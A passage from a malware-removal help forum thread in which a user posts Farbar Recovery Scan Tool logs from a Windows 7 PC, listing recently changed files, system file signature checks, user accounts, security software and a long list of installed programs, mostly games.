2017-08-10 12:21 - 2009-07-14 12:45 - 000026768 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-08-10 12:20 - 2011-04-12 22:46 - 000376078 _____ C:\Windows\system32\prfh0804.dat
2017-08-10 12:20 - 2011-04-12 22:46 - 000119784 _____ C:\Windows\system32\prfc0804.dat
2017-08-10 12:20 - 2009-07-14 13:13 - 001277832 _____ C:\Windows\system32\PerfStringBackup.INI
2017-08-10 12:17 - 2015-08-21 17:53 - 000000000 ____D C:\Program Files (x86)\StrongVPN
2017-08-10 12:14 - 2016-07-12 23:29 - 000000000 ____D C:\Program Files (x86)\Hi-Rez Studios
2017-08-10 12:14 - 2014-09-06 02:14 - 000000548 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2017-08-10 12:14 - 2009-07-14 13:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-08-10 12:13 - 2016-12-22 13:46 - 000004984 _____ C:\ProgramData\NvTelemetryContainer.log_backup1
2017-08-10 12:03 - 2016-12-03 19:05 - 000000000 ____D C:\AdwCleaner
2017-08-10 11:58 - 2014-09-06 10:09 - 000000000 ____D C:\Users\w7\AppData\Roaming\uTorrent
2017-08-10 02:53 - 2016-12-09 00:22 - 000000000 ____D C:\Users\w7\AppData\LocalLow\uTorrent
2017-08-09 15:31 - 2014-08-31 15:41 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-08-09 15:31 - 2014-08-31 15:41 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-08-09 15:31 - 2014-08-31 15:41 - 000004018 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-08-09 15:31 - 2014-08-31 15:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2017-08-09 15:31 - 2014-08-31 15:41 - 000000000 ____D C:\Windows\system32\Macromed
2017-08-09 13:05 - 2016-10-30 16:18 - 000000000 ____D C:\Users\w7\AppData\Local\Microsoft Windows
2017-08-09 04:30 - 2015-01-04 16:12 - 000000000 ____D C:\Users\w7\AppData\Roaming\Youtube Downloader HD
2017-08-08 21:58 - 2014-09-06 02:15 - 000002179 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-08 21:52 - 2014-09-06 02:16 - 000000000 ____D C:\Program Files (x86)\Steam
2017-08-08 21:41 - 2014-09-08 10:20 - 000000000 ____D C:\Users\w7\Documents\My Games
2017-08-08 16:23 - 2014-09-08 10:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics
2017-08-08 16:23 - 2014-08-31 13:15 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-08 15:57 - 2014-09-08 14:43 - 000000948 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-08-08 15:55 - 2014-09-08 14:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-08-08 15:45 - 2016-12-08 20:46 - 000000000 ____D C:\Users\w7\Desktop\2016 dec games
2017-08-08 14:19 - 2016-03-27 12:43 - 000000000 ____D C:\Users\w7\AppData\Local\CrashDumps
2017-08-08 13:11 - 2014-09-09 23:57 - 000000000 ____D C:\Windows\SysWOW64\directx
2017-08-08 07:53 - 2009-07-14 13:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2017-08-07 18:33 - 2015-04-05 17:23 - 000000000 ____D C:\Users\w7\Documents\Nexus Mod Manager
2017-08-07 15:11 - 2014-09-24 13:02 - 000000000 ____D C:\ProgramData\Oracle
2017-08-07 15:10 - 2014-09-24 13:02 - 000270912 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2017-08-07 15:10 - 2014-09-24 13:01 - 000097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2017-08-07 15:10 - 2014-09-24 13:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-08-07 15:09 - 2014-09-24 13:01 - 000000000 ____D C:\Program Files (x86)\Java
2017-08-07 01:07 - 2014-12-13 12:31 - 000000000 ____D C:\Users\w7\AppData\Roaming\Might & Magic Heroes VI
2017-08-07 00:42 - 2016-04-08 09:33 - 000000000 ____D C:\Users\w7\AppData\LocalLow\SogouPY
2017-08-04 02:58 - 2014-09-25 01:25 - 000007596 _____ C:\Users\w7\AppData\Local\resmon.resmoncfg
2017-08-03 15:18 - 2017-06-20 22:04 - 000000000 ____D C:\Users\w7\Desktop\mel concert doc
2017-08-03 15:17 - 2014-10-07 16:22 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-08-03 14:15 - 2014-09-13 17:05 - 000000000 ____D C:\Users\w7\AppData\Local\ESET
2017-08-01 18:21 - 2014-09-08 14:43 - 000000000 ____D C:\Users\w7\AppData\Roaming\Mozilla
2017-08-01 18:21 - 2014-09-08 14:43 - 000000000 ____D C:\Users\w7\AppData\Local\Mozilla
2017-07-31 22:33 - 2017-06-16 20:02 - 000000000 ____D C:\Users\w7\AppData\Local\BjIhIWsdsu
2017-07-31 22:33 - 2017-05-02 17:41 - 000000000 ____D C:\Program Files (x86)\YoutubeAdBlockUn
2017-07-31 22:33 - 2017-05-02 17:41 - 000000000 ____D C:\Program Files (x86)\YoutubeAdBlockIE
2017-07-31 22:33 - 2017-04-25 04:40 - 000000000 ____D C:\ProgramData\locep
2017-07-31 22:31 - 2017-05-02 17:40 - 000000000 ____D C:\Program Files (x86)\ParentalControl
2017-07-29 23:25 - 2017-06-23 11:41 - 000000000 ____D C:\Users\w7\Desktop\photo
2017-07-29 23:24 - 2017-06-20 23:23 - 000000000 ____D C:\Users\w7\Desktop\firestorm kill
2017-07-29 17:44 - 2015-08-08 15:57 - 000003858 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1439020676
2017-07-29 17:44 - 2015-08-08 15:56 - 000000000 ____D C:\Program Files (x86)\Opera
 
==================== Files in the root of some directories =======
 
2017-06-20 16:04 - 2017-06-20 16:04 - 000000034 _____ () C:\Users\w7\AppData\Roaming\AdobeWLCMCache.dat
2016-04-26 02:00 - 2016-04-26 01:41 - 000381678 _____ () C:\Users\w7\AppData\Roaming\favicon.ico
2016-04-26 02:12 - 2016-04-26 02:16 - 000000174 _____ () C:\Users\w7\AppData\Roaming\Friend in War.url
2014-09-29 13:53 - 2015-10-12 21:49 - 000000849 _____ () C:\Users\w7\AppData\Roaming\SkinColor.xml
2015-08-16 11:37 - 2015-08-16 12:59 - 000000009 _____ () C:\Users\w7\AppData\Roaming\update.dat
2014-10-11 13:26 - 2014-10-11 13:26 - 000000008 _____ () C:\Users\w7\AppData\Roaming\_
2015-08-16 11:38 - 2015-08-16 17:06 - 000000004 _____ () C:\Users\w7\AppData\Roaming\Microsoft\notaut.txt
2014-08-31 13:06 - 2014-08-31 13:06 - 000000000 _____ () C:\Users\w7\AppData\Local\Driver_LOM_8161Present.flag
2014-09-25 01:25 - 2017-08-04 02:58 - 000007596 _____ () C:\Users\w7\AppData\Local\resmon.resmoncfg
2016-06-06 04:53 - 2016-06-06 04:53 - 000000000 _____ () C:\Users\w7\AppData\Local\{A1C3DF51-7A7C-440D-B2A0-4C29F88A9C66}
2016-06-06 04:53 - 2016-06-06 04:53 - 000000000 _____ () C:\Users\w7\AppData\Local\{A4ADC871-5904-4807-91AB-FAEDB4D2493C}
2016-07-18 11:26 - 2016-07-18 11:26 - 000000108 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-12-22 13:46 - 2017-08-10 15:44 - 000004165 _____ () C:\ProgramData\NvTelemetryContainer.log
2016-12-22 13:46 - 2017-08-10 12:13 - 000004984 _____ () C:\ProgramData\NvTelemetryContainer.log_backup1
 
Some files in TEMP:
====================
2017-08-10 12:17 - 2017-08-07 19:30 - 000744856 _____ (Strong Technology, LLC) C:\Users\w7\AppData\Local\Temp\StrongHelper.exe
 
Some zero byte size files/folders:
==========================
C:\Windows\System32\Drivers\297854E4.sys
C:\Windows\System32\Drivers\30BE558E.sys
C:\Windows\System32\Drivers\73A4511A.sys
C:\Windows\System32\Drivers\7421544B.sys
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-08-04 18:42
 
==================== End of FRST.txt ============================


#4 sirjoe1

Posted 10 August 2017 - 07:58 AM

Addition log:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 09-08-2017
Ran by w7 (10-08-2017 20:43:23)
Running from C:\Users\w7\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2014-08-31 05:03:08)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1997723473-3802709511-3419621205-500 - Administrator - Disabled)
Guest (S-1-5-21-1997723473-3802709511-3419621205-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1997723473-3802709511-3419621205-1003 - Limited - Enabled)
w7 (S-1-5-21-1997723473-3802709511-3419621205-1000 - Administrator - Enabled) => C:\Users\w7
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: ESET NOD32 Antivirus 7.0 (Enabled - Out of date) {19259FAE-8396-A113-46DB-15B0E7DFA289}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: ESET NOD32 Antivirus 7.0 (Enabled - Out of date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
"BioShock Infinite" (HKLM-x32\...\{D081C29C-1DDC-4C55-BCBF-DF8519636331}_is1) (Version: 1.1.25.5165 - )
«Darksiders II»  1.5.up6 (HKLM-x32\...\Darksiders II_is1) (Version: 1.5.up6 - THQ)
«Might and Magic Heroes VI»  1.7.1 (HKLM-x32\...\Might&Magic Heroes VI_is1) (Version: 1.7.1 - Black Hole Entertainment)
µTorrent (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\uTorrent) (Version: 3.4.7.42330 - BitTorrent Inc.)
360云盘 (HKLM-x32\...\360云盘(网盘版)) (Version: 6.5.6.1288 - 360安全中心)
4K Video Downloader 3.8 (HKLM-x32\...\4K Video Downloader_is1) (Version: 3.8.0.1830 - Open Media LLC)
Abyss Odyssey (HKLM-x32\...\Abyss Odyssey_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Adobe Creative Suite 5.5 Master Collection (HKLM-x32\...\{D57FC112-312E-4D70-860F-2DB8FB6858F0}) (Version: 5.5 - Adobe Systems Incorporated)
Adobe Flash Player 26 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 26.0.0.151 - Adobe Systems Incorporated)
Adobe Flash Player 26 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 26.0.0.151 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015 (HKLM-x32\...\{5680D629-B263-49CC-821E-3CEBD4507B51}) (Version: 19.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Age of Castles (HKLM-x32\...\Age of Castles) (Version:  - )
Age of Mythology: Extended Edition Tale of the Dragon (HKLM\...\YWdlb2ZteXRob2xvZ3lleHRlbmRlZGVkaXRpb24_is1) (Version: 1 - )
AIDA64 Extreme v5.60 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.60 - FinalWire Ltd.)
Alice - Madness Returns (HKLM-x32\...\Alice - Madness Returns_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Alice Madness Returns (HKLM-x32\...\{93A3AB24-36E8-41BA-80C6-CCEC237836DC}) (Version: 1.0.0.0 - Electronic Arts)
Alien - Isolation (HKLM-x32\...\Alien - Isolation_is1) (Version:  - )
Alien Breed 2: Assault (HKLM-x32\...\Steam App 22650) (Version:  - Team17 Software Ltd.)
Alien Swarm: Reactive Drop (HKLM\...\Steam App 563560) (Version:  - Reactive Drop Team)
Aliens: Colonial Marines (HKLM-x32\...\Aliens: Colonial Marines_is1) (Version:  - )
Android USB Driver (HKLM-x32\...\Z5 Android USB Driver_is1) (Version:  - )
Anno 2070 version 2.0 (HKLM-x32\...\{B6249B57-3A35-4E06-A747-F79AE49F275D}_is1) (Version: 2.0 - )
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 376.33 - NVIDIA Corporation) Hidden
Apotheon Arena (HKLM\...\Steam App 417890) (Version:  - Alientrap)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Balabolka (HKLM-x32\...\Balabolka) (Version: 2.11.0.607 - Ilya Morozov)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 1 v.версия 1.0.u3 (HKLM-x32\...\Battlefield 1_is1) (Version:  - )
Battlefield 4 (HKLM-x32\...\Battlefield 4_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.3.32.6227 - BlueStack Systems, Inc.)
Brawlhalla (HKLM\...\Steam App 291550) (Version:  - Blue Mammoth Games)
Broken Age (HKLM-x32\...\Broken Age_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
C&C3 A NEW EXPERIENCE 1.0 (HKLM-x32\...\C&C3 A NEW EXPERIENCE 1.0) (Version: 1.0 - Omega Group Productions)
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
CDisplayEx 1.9.9 (HKLM\...\CDisplayEx_is1) (Version:  - cdisplayex.com)
Child of Light (HKLM-x32\...\Child of Light_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
CloudPirates (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\CloudPirates) (Version: 1.40 - My.com B.V.)
ColorOS USB Drivers 3.2.0 (HKLM\...\{60092746-6A0F-46A9-B9F1-53B62EC0E0A4}_is1) (Version: 3.2.0.17 - )
Command & Conquer Generals (HKLM-x32\...\{06F80017-8F98-4C94-B868-52358569FC32}) (Version: 0.50.0000 - Electronic Arts) Hidden
Command & Conquer Generals (HKLM-x32\...\InstallShield_{06F80017-8F98-4C94-B868-52358569FC32}) (Version: 0.50.0000 - Electronic Arts)
Command & Conquer™ Red Alert™ 3 (HKLM-x32\...\{296D8550-CB06-48E4-9A8B-E5034FB64715}) (Version: 1.0.1.0 - Electronic Arts)
Command & Conquer™ Red Alert™ 3 Uprising (HKLM-x32\...\{DDE59617-F59A-473B-BC4E-C2B81F6CD38D}) (Version: 1.0.1.0 - Electronic Arts)
Command and Conquer 4 - Tiberian Twilight (HKLM-x32\...\Command and Conquer 4 - Tiberian Twilight_is1) (Version:  - )
Command and ConquerTM Generals Zero Hour (HKLM-x32\...\{F3E9C243-122E-4D6B-ACC1-E1FEC02F6CA1}) (Version: 1.00.0000 - Electronic Arts) Hidden
Command and ConquerTM Generals Zero Hour (HKLM-x32\...\InstallShield_{F3E9C243-122E-4D6B-ACC1-E1FEC02F6CA1}) (Version: 1.00.0000 - Electronic Arts)
Counter-Strike: Condition Zero Deleted Scenes (HKLM\...\Steam App 100) (Version:  - Valve)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
CPUID CPU-Z 1.77 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
CPUID HWMonitor 1.28 (HKLM\...\CPUID HWMonitor_is1) (Version:  - )
CUPID - A free to play Visual Novel (HKLM\...\Steam App 421670) (Version:  - Fervent)
Dark Messiah Of Might And Magic (HKLM-x32\...\Dark Messiah Of Might And Magic_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Darkest Dungeon (HKLM-x32\...\Darkest Dungeon_is1) (Version:  - )
Defense Grid 2 (HKLM-x32\...\Defense Grid 2_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Dishonored (HKLM-x32\...\Dishonored_is1) (Version:  - )
Don't Starve - Reign of Giants (HKLM-x32\...\Don't Starve: Reign of Giants_is1) (Version: 2.10.0.20 - GOG.com)
Don't Starve - Shipwrecked (HKLM-x32\...\Don't Starve: Shipwrecked_is1) (Version: 2.0.0.20 - GOG.com)
Don't Starve (HKLM-x32\...\1207659210_is1) (Version: 2.10.0.20 - GOG.com)
Don't Starve Together (HKLM\...\Steam App 322330) (Version:  - Klei Entertainment)
Dota 2 (HKLM\...\Steam App 570) (Version:  - Valve)
Download Accelerator Plus (DAP) (HKLM-x32\...\Download Accelerator Plus (DAP)) (Version: 10059 (Build 2593) - Speedbit Ltd.)
Dragon Age Inquisition Deluxe Edition version 1.11.0.0 (HKLM-x32\...\Dragon Age Inquisition Deluxe Edition_is1) (Version: 1.11.0.0 - Mr DJ)
Dragons and Titans (HKLM\...\Steam App 263500) (Version:  - Wyrmbyte)
Duelyst (HKLM\...\Steam App 291410) (Version:  - Counterplay Games Inc.)
Dying Light The Following Enhanced Edition version 1.10.0.0 (HKLM-x32\...\Dying Light The Following Enhanced Edition_is1) (Version: 1.10.0.0 - Techland)
ËæeÐÐWLAN v2.3.0_0510 (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\ËæeÐÐWLAN v) (Version: 2.3.0 - ÖйúÒƶ¯)
Empire Earth II (HKLM-x32\...\{DF315348-721C-40B8-BAE2-58C6C7D935A2}) (Version:  - )
Empire Earth II Gold Edition (HKLM-x32\...\Empire Earth II Gold Edition_is1) (Version:  - GOG.com)
Escape From Paradise 2 - A Kingdom's Quest 1.00 (HKLM-x32\...\Escape From Paradise 2 - A Kingdom's Quest 1.00) (Version:  - )
ESET NOD32 Antivirus (HKLM\...\{FBC0F617-1AA0-4483-8153-3FD97FE01D9E}) (Version: 7.0.317.4 - ESET, spol s r. o.)
FaceRig version 1.423 (HKLM-x32\...\FaceRig_is1) (Version: 1.423 - )
FaceRig virtual audio driver version 1.0 (HKLM-x32\...\{D605CD1D-D626-4740-B657-86DC30723FCF}_is1) (Version: 1.0 - Adoriasoft LLC)
FaceRig Virtual Video driver version 1.0.1.1000 (HKLM-x32\...\{7D6A1A0F-F57E-4C6B-9331-86CBC7D5C787}_is1) (Version: 1.0.1.1000 - Adoriasoft LLC)
Far Cry Primal (HKLM-x32\...\{80BD47AF-CF13-49B2-99BF-7E78FBA26124}_is1) (Version:  - Ubisoft)
Foxit Reader (HKLM-x32\...\Foxit Reader) (Version:  - )
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Free GIF Viewer (HKLM-x32\...\{C178910D-907A-4FBD-9786-91AFDD85287D}) (Version: 1.0.0 - Media Freeware)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version:  - GOG.com)
Golden Axe (1990) (HKLM-x32\...\Golden Axe (1990)) (Version:  - Friends in War)
Golden Axe (HKLM-x32\...\Golden Axe_is1) (Version:  - GameFabrique)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.90 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\Grand Theft Auto V_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, ProZorg_tm)
Grand Theft Auto V (HKLM-x32\...\R3JhbmRUaGVmdEF1dG9W_is1) (Version: 1 - )
Gwent (HKLM-x32\...\1971477531_is1) (Version: 2.0.0.3 - GOG.com)
Halo Wars Definitive Edition (HKLM-x32\...\Halo Wars Definitive Edition_is1) (Version:  - )
HELLDIVERS™ (HKLM\...\Steam App 394510) (Version:  - Arrowhead Game Studios)
Heroes of Might & Magic V (HKLM-x32\...\Steam App 15170) (Version:  - Nival)
Heroes of Might & Magic V: Hammers of Fate (HKLM-x32\...\Steam App 15380) (Version:  - Nival)
Heroes of Might & Magic V: Tribes of the East (HKLM-x32\...\Steam App 15370) (Version:  - Nival)
Heroes of Might and Magic 3 Complete (HKLM-x32\...\Heroes of Might and Magic 3 Complete_is1) (Version:  - GOG.com)
Heroes of Might and Magic 4 Complete (HKLM-x32\...\Heroes of Might and Magic 4 Complete_is1) (Version:  - GOG.com)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HWiNFO64 Version 5.38 (HKLM\...\HWiNFO64_is1) (Version: 5.38 - Martin Mal韐 - REALiX)
ICEY (HKLM\...\Steam App 553640) (Version:  - Shanghai FantaBlade Network Technology Co., Ltd.)
Impossible Creatures (HKLM-x32\...\Impossible Creatures 1.0) (Version:  - )
IMVU Avatar Chat Software (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\IMVU Avatar chat client software BETA) (Version:  - )
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.1.28 - Intel Corporation)
Intel® Wireless Bluetooth®(patch version 17.1.1512.771) (HKLM\...\{302600C1-6BDF-4FD1-1501-148929CC1385}) (Version: 17.1.1501.0514 - Intel Corporation)
IsoBuster 3.5 (HKLM-x32\...\IsoBuster_is1) (Version: 3.5 - Smart Projects)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
K-Lite Codec Pack 11.4.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.4.0 - )
KLM (HKLM-x32\...\{4DEA5B85-6C56-45F3-AE00-FED756B0D3B4}) (Version: 1.0.1305.3101 - Micro-Star International Co., Ltd.) Hidden
KLM (HKLM-x32\...\InstallShield_{4DEA5B85-6C56-45F3-AE00-FED756B0D3B4}) (Version: 1.0.1305.3101 - Micro-Star International Co., Ltd.)
Layers of Fear (HKLM-x32\...\Layers of Fear_is1) (Version:  - )
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Life Is Strange (HKLM-x32\...\Life Is Strange_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Logitech Gaming Software 8.88 (HKLM\...\Logitech Gaming Software) (Version: 8.88.30 - Logitech Inc.)
Lost Planet 3 (HKLM-x32\...\Lost Planet 3_is1) (Version:  - Capcom)
MadOut (HKLM-x32\...\Assault Android Cactus_is1) (Version:  - )
Mafia 3 (HKLM-x32\...\Mafia 3_is1) (Version: 1.09.1 - THE KNIGHT)
Mafia II version 1.0 (HKLM-x32\...\{4F5FB47E-14DE-45B4-85E3-11CD5E497KA3}_is1) (Version: 1.0 - 2K Games)
Magic ISO Maker v5.5 (build 0281) (HKLM-x32\...\Magic ISO Maker v5.5 (build 0281)) (Version:  - )
MagicDisc 2.7.106 (HKLM-x32\...\MagicDisc 2.7.106) (Version:  - )
Magicka (HKLM-x32\...\Steam App 42910) (Version:  - Arrowhead Game Studios)
Magicka 2 (HKLM-x32\...\Magicka 2_is1) (Version:  - )
Magicka 2: Ice, Death and Fury (HKLM\...\bWFnaWNrYTJpY2VkZWF0aGFuZGZ1cnk_is1) (Version: 1 - )
Malwarebytes Anti-Malware versione 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Malwarebytes version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version:  - Gazillion Entertainment)
Marvel Heroes 2016 (HKLM\...\Steam App 226320) (Version:  - Gazillion Entertainment)
Metal Slug Series with Enabled MAME 0.78 (HKLM-x32\...\Metal Slug Series Enabled MAME 0.78_is1) (Version:  - )
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{86CE1746-9EFF-3C9C-8755-81EA8903AC34}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Word 2010 (HKLM-x32\...\Office14.WORD) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Microtool version 1.1.0 (HKLM-x32\...\Microtool_is1) (Version: 1.1.0 - Microtool Technologies)
